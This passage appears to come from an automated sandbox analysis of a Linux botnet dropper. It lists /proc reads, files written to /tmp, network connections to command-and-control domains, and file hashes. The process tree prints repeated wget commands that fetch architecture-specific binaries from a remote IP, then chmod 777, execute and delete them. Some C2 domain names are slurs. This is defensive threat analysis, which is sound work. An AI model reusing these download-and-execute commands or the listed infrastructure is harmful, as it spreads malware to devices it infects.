| File opened for reading | /proc/901/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1005/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1251/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1489/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1291/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1336/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/769/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/959/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1107/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1273/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1313/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1317/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1352/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1367/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/770/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/878/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/890/status | /tmp/empsl | N/A |
| File opened for reading | /proc/1074/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1388/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/967/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/981/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1315/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1449/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1263/status | /tmp/empsl | N/A |
| File opened for reading | /proc/1427/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1396/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1479/status | /tmp/empsl | N/A |
| File opened for reading | /proc/860/status | /tmp/empsl | N/A |
| File opened for reading | /proc/947/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/958/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1187/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/902/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1214/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/37/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/884/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1115/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1447/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/802/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1390/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/882/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1016/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1102/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1147/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1599/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/774/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/851/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/892/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1144/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1084/status | /tmp/empsl | N/A |
| File opened for reading | /proc/1480/status | /tmp/empsl | N/A |
| File opened for reading | /proc/697/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1091/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1572/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1333/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1387/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/920/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1088/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1259/cmdline | /tmp/empsl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/emips | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/earm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/earm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/emips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/empsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/earm | /usr/bin/wget | N/A |
Processes
/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown
[/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown]
/bin/rm
[rm -rf earm]
/usr/bin/wget
[wget http://185.157.247.125/c/earm]
/bin/chmod
[chmod 777 earm]
/tmp/earm
[./earm asus]
/bin/rm
[rm -rf earm]
/bin/rm
[rm -rf earm5]
/usr/bin/wget
[wget http://185.157.247.125/c/earm5]
/bin/chmod
[chmod 777 earm5]
/tmp/earm5
[./earm5 asus]
/bin/rm
[rm -rf earm5]
/bin/rm
[rm -rf earm6]
/usr/bin/wget
[wget http://185.157.247.125/c/earm6]
/bin/chmod
[chmod 777 earm6]
/tmp/earm6
[./earm6 asus]
/bin/rm
[rm -rf earm6]
/bin/rm
[rm -rf earm7]
/usr/bin/wget
[wget http://185.157.247.125/c/earm7]
/bin/chmod
[chmod 777 earm7]
/tmp/earm7
[./earm7 asus]
/bin/rm
[rm -rf earm7]
/bin/rm
[rm -rf emips]
/usr/bin/wget
[wget http://185.157.247.125/c/emips]
/bin/chmod
[chmod 777 emips]
/tmp/emips
[./emips asus]
/bin/rm
[rm -rf emips]
/bin/rm
[rm -rf empsl]
/usr/bin/wget
[wget http://185.157.247.125/c/empsl]
/bin/chmod
[chmod 777 empsl]
/tmp/empsl
[./empsl asus]
/bin/rm
[rm -rf empsl]
Network
| Country | Destination | Domain | Proto |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| AU | 103.1.206.179:53 | trump2024.oss | udp |
| AU | 203.96.177.158:4096 | trump2024.oss | tcp |
| GB | 45.95.18.100:4096 | trump2024.oss | tcp |
| US | 144.208.127.181:4096 | trump2024.oss | tcp |
| US | 146.71.81.108:4096 | trump2024.oss | tcp |
| US | 162.243.19.47:53 | liberalretard.libre | udp |
| US | 146.71.81.108:4096 | liberalretard.libre | tcp |
| GB | 45.95.18.100:4096 | liberalretard.libre | tcp |
| US | 144.208.127.181:4096 | liberalretard.libre | tcp |
| AU | 203.96.177.158:4096 | liberalretard.libre | tcp |
| US | 1.1.1.1:53 | xaiverbot.net | udp |
| NL | 185.198.234.82:4096 | xaiverbot.net | tcp |
| US | 144.208.127.181:4096 | xaiverbot.net | tcp |
| AU | 203.96.177.158:4096 | xaiverbot.net | tcp |
| GB | 45.95.18.100:4096 | xaiverbot.net | tcp |
| US | 146.71.81.108:4096 | xaiverbot.net | tcp |
| CH | 9.9.9.9:53 | xaiverbot.net | udp |
| NL | 185.198.234.82:4096 | xaiverbot.net | tcp |
| GB | 45.95.18.100:4096 | xaiverbot.net | tcp |
| US | 146.71.81.108:4096 | xaiverbot.net | tcp |
| US | 144.208.127.181:4096 | xaiverbot.net | tcp |
| AU | 203.96.177.158:4096 | xaiverbot.net | tcp |
| US | 208.67.222.222:53 | xaiverbot.net | udp |
| AU | 203.96.177.158:4096 | xaiverbot.net | tcp |
| GB | 45.95.18.100:4096 | xaiverbot.net | tcp |
Files
/tmp/earm
| MD5 | 300cd530fb0a7f7cf6db875f68c0483e |
| SHA1 | a4bce294dc142fb1354e917bed4d58c98f381850 |
| SHA256 | a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885 |
| SHA512 | 656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1 |
/tmp/earm5
| MD5 | 17b0ebeb1226ffff541eb2551cc542ae |
| SHA1 | f08a0c96f0ec5df5e5de2f399ef319e514fa799e |
| SHA256 | 02f8431d1bf70570d5bd9cdebb3bdf457f3296d508139506767413b9b982b3c9 |
| SHA512 | 2692b1de8ecb7a8d5e95c8ea2ac423483f7c619fa624662fbe74f8949d2db0ee59a12ad5bd6d873e123fed97daea139bb94bb25d4f7c712a1bc55bc1a096f72a |
/tmp/earm7
| MD5 | 521069251bdce0fbd37497b8f527ab23 |
| SHA1 | 020730190edde76dec3de9678351aa6e65ab91bf |
| SHA256 | aa5db395352aff621bc290b0eb2f7715230f93556ac99cc056cd22a56a5adc72 |
| SHA512 | 09e176cdbcb48370c273ea4733d1c0c8f64625f2070ab7742b929268d5cb6bd97d091c884223777ccd0877209d65db1c8d56adaf3063d7fcfc9f44e127649f70 |
/tmp/emips
| MD5 | c0b34d8a59f793b636b5424b8e96a64a |
| SHA1 | d5eac6c7b3a5953ffcd642de9db2cd1c45463e96 |
| SHA256 | defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270 |
| SHA512 | 57446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4 |
/tmp/empsl
| MD5 | 3cfc76868e26201ac03e0583b7c8aaba |
| SHA1 | 03436d9d090e1f944fecf60adc1e45f90df20c26 |
| SHA256 | 8c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d |
| SHA512 | 84add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2 |